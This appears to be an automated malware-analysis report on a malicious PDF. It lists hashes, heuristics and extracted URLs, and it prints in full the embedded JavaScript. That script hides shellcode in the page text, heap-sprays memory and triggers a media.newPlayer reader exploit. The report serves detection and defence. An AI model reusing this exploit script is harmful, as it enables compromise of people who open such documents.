Malicious PDF — malware analysis report

Static analysis result for SHA-256 841ef52378606861…

MALICIOUS

PDF

609.9 KB Created: 2010-03-22 12:48:07 Authoring application: Scribus 1.3.3.14 (via Scribus PDF Library 1.3.3.14) First seen: 2026-05-10
MD5: 5a2a31ab84a591e2b5670cbb8149a592 SHA-1: 4a8fefc99953ffa88b231e14ab4f3030ec5eaa3f SHA-256: 841ef523786068616b12b1d137fba92792df94de7c5b47dda936414ec4aefe99
150 Risk Score

Malware Insights

MITRE ATT&CK
T1059.007 JavaScript T1203 Exploitation for Client Execution

The PDF file contains embedded JavaScript that utilizes the unescape function and performs a heap spray. This behavior, combined with the 'PDF_JS_EXPLOIT_CLUSTER' heuristic, strongly suggests an attempt to exploit a client-side vulnerability. The script's complexity and obfuscation indicate it's designed to download and execute a secondary payload, though the exact nature of that payload cannot be determined from the provided evidence.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9136

Heuristics 5

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    }
var Wo = unescape(shell);
var yR = unescape('%u3727%u27f5');
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.monotype.comMonotype Referenced by PDF JavaScript
    • http://www.monotype.com/html/mtname/ms_timesnewroman.htmlhttp://www.monotype.com/html/mtname/ms_welcome.htmlhttp://www.monotype.com/html/type/license.htmlReferenced by PDF JavaScript
    • https://www.verisign.com/rpaReferenced by PDF JavaScript
    • http://ocsp.verisign.com/ocsp/status0Referenced by PDF JavaScript
    • https://www.verisign.com/rpa0Referenced by PDF JavaScript
    • http://crl.microsoft.com/pki/crl/products/CodeSignPCA.crl0Referenced by PDF JavaScript
    • http://www.microsoft.com/typographyReferenced by PDF JavaScript

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0052_001.js pdf-javascript-stream PDF /JS object 52 at offset 0x97FCA 1305 bytes
SHA-256: 4f93d2efd83b680305a7aec4ad5d3c398c80f49d351ba3eb200c665a9a19b9e8
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
function New_Script()
{
var ckWord, numWords;
var text = '';

for (var i = 0; i < this.numPages; i++ ) 
{
numWords = this.getPageNumWords(i);
for (var j = 0; j < numWords; j++) 
{
ckWord = this.getPageNthWord(i, j);
text = text + ckWord.toString();
}
}

text = text + ' ';



var k = 1;
var b=0;
var shell = '';
var shell_1 = '';
var shell_2 = '';
var u_shell = '';
var pos = 0;
while (pos < (text.length-1)) {
 pos += k;
 if(!b)
 {
	b = 1;
	if (pos < text.length)
	{ shell_1 = shell_1 + text[pos] + text[pos+1]; pos+=2; }
	else 
	{ shell_1 = shell_1 + text[pos]; pos+=1; }
 }
 else
 {
	b = 0;
	if (pos < text.length)
	{ shell_2 = shell_2 + text[pos] + text[pos+1]; pos+=2; }
	else 
	{ shell_2 = shell_2 + text[pos]; pos+=1; }
	
	u_shell = '%u'+shell_2+shell_1;
	shell_1 = '';
	shell_2 = '';
	shell += u_shell;
 }
 k++;
 if (k>3) k = 1;
}
var Wo = unescape(shell);
var yR = unescape('%u3727%u27f5');
for(i=0;i<15;){yR+=yR;i ++;}
yR=yR.substring(0,32768 - Wo.length);

memory=new Array();

for(i=0;i<0x2000;) {
	memory[i]= yR + Wo; i ++;
}

util.printd("1.345678901.345678901.3456 : 1.31.34", new Date());
util.printd("1.345678901.345678901.3456 : 1.31.34", new Date());
try {var obj = this.media;obj['new'+'Player'](null);} catch(e) {}
util.printd("1.345678901.345678901.3456 : 1.31.34", new Date());


}
stream_000_off00000782.bin decompressed-pdf-stream PDF FlateDecoded stream at offset 0x782 409280 bytes
SHA-256: fcb479a00bdf7c05a68b91ba89a8ea3dd2be027dcca112f1f26270c081dc3502

Open this report in the interactive analyzer, or submit your own file for analysis.